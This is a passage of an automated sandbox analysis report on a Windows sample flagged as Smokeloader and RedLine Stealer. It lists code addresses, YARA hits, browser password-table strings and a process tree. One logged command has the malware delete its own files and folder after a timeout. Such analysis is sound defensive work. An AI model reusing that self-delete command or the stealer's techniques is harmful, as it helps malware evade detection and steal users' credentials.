                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA0CA7013_2_6CA0CA70
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA30BA013_2_6CA30BA0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA96BE013_2_6CA96BE0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CABA48013_2_6CABA480
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9D64D013_2_6C9D64D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2A4D013_2_6CA2A4D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA1A43013_2_6CA1A430
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F442013_2_6C9F4420
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9A846013_2_6C9A8460
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9845B013_2_6C9845B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5A5E013_2_6CA5A5E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA1E5F013_2_6CA1E5F0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA3057013_2_6CA30570
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9E854013_2_6C9E8540
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA9454013_2_6CA94540
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD855013_2_6CAD8550
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F256013_2_6C9F2560
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2E6E013_2_6CA2E6E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9B46D013_2_6C9B46D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9EE6E013_2_6C9EE6E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9EC65013_2_6C9EC650
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9BA7D013_2_6C9BA7D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA1070013_2_6CA10700
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C98809013_2_6C988090
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6C0B013_2_6CA6C0B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9A00B013_2_6C9A00B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5C00013_2_6CA5C000
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5801013_2_6CA58010
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9DE07013_2_6C9DE070
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9901E013_2_6C9901E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA0613013_2_6CA06130
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA7413013_2_6CA74130
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F814013_2_6C9F8140
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA622A013_2_6CA622A0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5E2B013_2_6CA5E2B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB162C013_2_6CB162C0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6822013_2_6CA68220
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA5A21013_2_6CA5A210
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA1826013_2_6CA18260
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2825013_2_6CA28250
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9EE3B013_2_6C9EE3B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9C23A013_2_6C9C23A0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9E43E013_2_6C9E43E0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA0232013_2_6CA02320
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAAC36013_2_6CAAC360
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2637013_2_6CA26370
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C99834013_2_6C998340
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD237013_2_6CAD2370
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C99237013_2_6C992370
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA2FC8013_2_6CA2FC80
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA51CE013_2_6CA51CE0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACDCD013_2_6CACDCD0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9A1C3013_2_6C9A1C30
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C993C4013_2_6C993C40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAB9C4013_2_6CAB9C40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C983D8013_2_6C983D80
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD9D9013_2_6CAD9D90
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA61DC013_2_6CA61DC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F3D0013_2_6C9F3D00
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9B3EC013_2_6C9B3EC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA9DE1013_2_6CA9DE10
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB15E6013_2_6CB15E60
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAEBE7013_2_6CAEBE70
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9B1F9013_2_6C9B1F90
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA3BFF013_2_6CA3BFF0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAADFC013_2_6CAADFC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB13FC013_2_6CB13FC0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAE7F2013_2_6CAE7F20
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C985F3013_2_6C985F30
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9C5F2013_2_6C9C5F20
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA6F8F013_2_6CA6F8F0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAEB8F013_2_6CAEB8F0
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: String function: 004087A0 appears 54 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: String function: 0214F807 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: String function: 0040F5A0 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: String function: 02148A07 appears 57 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6CAC9F30 appears 31 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6C9B3620 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6C9B9B10 appears 76 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6CB1D930 appears 49 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6CB1DAE0 appears 60 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: String function: 6CB109D0 appears 268 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                  Source: aarhevh.2.drStatic PE information: No import functions for PE file found
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: No import functions for PE file found
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aarhevh.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aarhevh.2.drStatic PE information: Section .text
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section .text
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/35@4/9
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,13_2_6C9F0300
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007BE78E CreateToolhelp32Snapshot,Module32First,5_2_007BE78E
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0042B20E CoCreateInstance,5_2_0042B20E
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aarhevhJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21AE.tmpJump to behavior
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: 21AE.exe, 00000005.00000003.2359456032.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371853553.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2358592973.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371430067.0000000002C96000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814035133.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2830660684.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, HIDAFH.13.dr, BFHJJJ.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeReversingLabs: Detection: 55%
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeVirustotal: Detection: 59%
                  Source: unknownProcess created: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exe
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exe
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msvcr100.dllJump to behavior
